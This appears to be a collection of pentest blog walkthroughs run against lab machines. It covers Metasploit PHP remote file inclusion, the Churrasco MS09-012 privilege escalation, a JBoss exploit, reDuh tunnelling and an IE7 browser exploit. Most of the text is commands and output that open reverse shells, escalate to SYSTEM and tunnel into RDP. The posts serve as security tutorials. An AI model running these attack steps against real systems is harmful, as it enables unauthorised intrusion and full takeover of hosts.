Using the Metasploit PHP Remote File Include Module

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

and make your PHPURI

PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX

let's see it in action

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
hdm
egypt

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:
Space: 32768

Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:

msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010

dir
0.jpeg  header.inc.php license.txt slog_users.txt  version.txt
1.jpeg  index.asp old  slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php

id uid=33(www-data) gid=33(www-data) groups=33(www-data)

Playing with the MS09-012 Windows Local Exploit

Back in 09 there was a buzz about token kidnapping by Argeniss
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

subsequently patched http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.

Lets see it in action.

We have our network service shell, push up our churrasco binary, metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.

[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv

Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.

meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010  06:53 AM              .
05/10/2010  06:53 AM              ..
05/10/2010  06:53 AM           410,624 Churrasco.bin
02/21/2003  06:48 PM             1,433 iisstart.htm
05/10/2010  07:19 AM            37,888 shell.bin
05/10/2010  07:43 AM               173 test4.asp;.txt
           4 File(s)      2,105,685 bytes
            2 Dir(s)  36,227,641,344 bytes free

Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah

C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM

on the multi/handler side...

[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)


(C) Copyright 1985-2003 Microsoft Corp.

C:\Inetpub\wwwroot>whoami
whoami
nt authority\system

C:\Inetpub\wwwroot>^Z
Background session 1? [y/N]  y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)

msf exploit(handler) > sessions -l

Active sessions
===============

Id  Type         Information                           Connection
--  ----         -----------                           ----------
1   shell        Microsoft Windows [Version 5.2.3790]  192.168.6.94:443 -> 192.168.6.94:62854
2   meterpreter  NT AUTHORITY\SYSTEM @ LAB          192.168.6.94:443 -> 192.168.6.94:62855

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Metasploit jboss deployment file repository exploit

MC pushed out a new exploit today (jboss_deploymentfilerrepository)

so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)

msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami
whoami
win2k3lab\administrator

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
Background session 3? [y/N]  y
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type   Information  Connection
--  ----   -----------  ----------
3   shell               192.168.1.101:4444 -> 192.168.1.101:57796

msf exploit(jboss_deploymentfilerepository) > sessions -u 3

msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010

msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type         Information                                      Connection
--  ----         -----------                                      ----------
3   shell                                                         192.168.1.101:4444 -> 192.168.1.101:57796
4   meterpreter  win2k3lab\Administrator @ win2k3lab  192.168.1.101:4444 -> 192.168.1.101:36591

msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: win2k3lab\Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
meterpreter > 

More On Using Sensepost's reDuh

(mirrored from carnal0wnage.attackresearch.com)

A bit more on sensepost's reDuh

sensepost page on it: http://www.sensepost.com/research/reDuh/

reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client

yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010

Once you are connected to the remote end, in another terminal connect to your local reDuh instance.

yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}

Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity

>>[createTunnel]4567:172.16.82.144:3389
Successfully bound locally to port 4567. Awaiting connections.

In your other shell you should see something similar to this:

[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.

Fire up your terminal server client and point it at localhost:4567

[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port) [Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1

If all is working you'll see a shitload of http traffic and eventually your RDP prompt.

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time it figuring out. It's pretty straight forward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an inital PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
sf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debuggging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis

Reliable Local Root since 2006?

now that's just friggin sweet...

http://blog.eonsec.com/2008/02/reliable-root-since-2006.html